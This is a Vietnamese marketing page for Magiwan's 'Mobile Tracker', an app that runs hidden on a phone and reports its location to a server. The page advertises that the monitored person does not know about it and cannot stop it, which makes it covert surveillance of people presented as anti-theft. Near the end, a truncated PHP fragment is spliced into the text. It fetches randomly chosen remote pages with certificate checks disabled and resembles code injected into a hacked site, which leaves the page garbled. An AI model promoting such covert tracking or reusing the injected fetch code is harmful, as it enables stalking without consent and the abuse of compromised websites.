Mobile Tracker

Mobile Tracker

I. Giới Thiệu

Mobile Tracker là phần mềm được phát triển bởi Magiwan chạy ngầm trên điện thoại di động, âm thầm gửi toạ độ chiếc điện thoại di động về trung tâm lưu trữ dữ liệu (Server) theo thời gian nhất định. Một khi điện thoại bị lấy cắp, chủ nhân chỉ việc lên mạng, truy cập vào tài khoản của mình (được bảo mật), toàn bộ hành tung của người cầm chiếc máy sẽ được ghi nhận dưới dạng lộ trình và được mô phỏng chi tiết trên bản đồ số của phần mềm Magiwan. Chủ nhân chỉ cần liên lạc với công an địa phương, nơi nghi phạm lui tới để lấy điện thoại về.

 

xac dinh vi tri dien thoai

   1. Tính năng:
     – Ứng dụng hoạt động một cách độc lập, đối tượng cần giám sát không biết và không thể can thiệp khi điện thoại đang hoạt động.
     – Dung lượng nhỏ gọn (20KB), cài đặt dễ dàng và nhanh chóng (30 giây)
     – Không gây hao tốn pin trong quá trình chạy ứng dụng.
     – Thông tin định vị có độ chính xác cao.
     – Định vị cả khi mất GPS bằng công nghệ Wifi và Cell-ID.
     - Giám sát vị trí bằng tin nhắn SMS (Xem chi tiết

 

   2. Ứng dụng:
     – Giám sát chống trộm điện thoại
     – Giám sát thất lạc điện thoại và đối tượng quản lý khác.
     – …

 

II.  Đặc Điểm Nổi Bật

   – Giám sát lộ trình di chuyển của điện thoại di động theo thời gian thực 24/24.

   – Lưu trữ lộ trình và xem lại lộ trình của điện thoại di động trong quá khứ.

   – Quản lý, giám sát vị trí một hoặc nhiều điện thoại cùng lúc.

   – Điều chỉnh thời gian gửi vị trí điện thoại.

   – Xem thời lương Pin của điện thoại theo thời gian thực.

   – Báo cáo chi tiết điện thoại di động vào những vùng đã định sẵng.

   – …

 

III. Bảng Giá

   – Phiên bản miễn phí: Dùng thử full tính năng như bản tính phí trong vòng 7 ngày.

   – Phiên bản tính phí: Dữ liệu về vị trí điện thoại được lưu từ 01 đến 03 tháng và có thể xem nhiều báo cáo hữu ích. Chi tiết Lh: 0902 734 366

       

STT

Tính Năng Sản Phẩm

Miễn Phí

Tính Phí

Ghi Chú

1

Lưu dữ liệu “vị trí điện thoại”

01 ngày

03 tháng

 

2

Xem thời lương Pin

Hổ trợ

Hổ trợ

 

3

Xem lại lộ trình điện thoại

Hổ trợ

Hổ trợ

 

4

Điều chỉnh thời gian gửi vị trí của điện thoại

Không hỗ trợ

Hỗ trợ

 

5

Báo cáo tổng hợp theo ngày

Không hỗ trợ

Hỗ trợ

số km di chuyển,  thời gian dừng, thời gian chạy,………

6

Cảnh báo ra vào vùng

Không hỗ trợ

Hổ trợ

Thiết lập cảnh báo ra vào vùng

7

Cảnh báo dừng lâu ngoài khu vực cho phép

Không hỗ trợ

Hổ trợ

 

8

Báo cáo lịch sử lộ trình

Không hỗ trợ

Hổ trợ

 

9

Báo cáo tổng hợp điểm dừng

Không hỗ trợ

Hổ trợ

 

10

Báo cáo chi tiết điểm dừng

Không hỗ trợ

Hổ trợ

 

11

Báo cáo tổng hợp ra vào vùng

Không hỗ trợ

Hổ trợ

 

12

Báo cáo chi tiết ra vào vùng

Không hỗ trợ

Hổ trợ

 

13

Biểu đồ thống kê KM, thời gian di chuyển

Không hỗ trợ

Hổ trợ

 

 

IV. Điều Khoản Sử Dụng

Điều khoản bắt buộc khi sử dụng phần mềm Mobile Tracker.

Tất cả người sử dụng phần mềm Mobile Tracker nhằm xác định vị trí chiếc điện thoại di động của mình, phải hiểu và chấp nhận tất cả các điều khoản dưới đây trước khi sử dụng:

 

    1. Phần mềm Mobile Tracker được sử dụng với mục đích quản lý điện thoại nhằm bảo vệ tài sản cá nhân.v.v. , Magiwan hoàn toàn không chịu trách nhiệm việc sử dụng phần mềm của chúng tôi cho các mục đích bất hợp pháp khác.

    2. Magiwan không chịu trách nhiệm về việc sử dụng phần mềm Mobile Tracker nhằm mục đích định vị người khác mà không có sự đồng ý của họ.

    3. Magiwan không chịu trách nhiệm cho bất kỳ thiệt hại nào khi cài phần mềm Mobile Tracker lên điện thoại của bạn.

    4. Các thông tin thu được từ việc theo định vị chỉ có tính chất tham khảo, không có giá trị làm bằng chứng hoặc dẫn chứng cho bất kỳ sự việc nào.

 

V. Xem demo

Truy cập pc.giamsatdienthoai.com và đăng nhập bằng Tên đăng nhập “demo“, mật khẩu “m.tracker“.

 

 html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>
Phân Phối Độc Quyền Bởi Magiwan  Like us on Facebook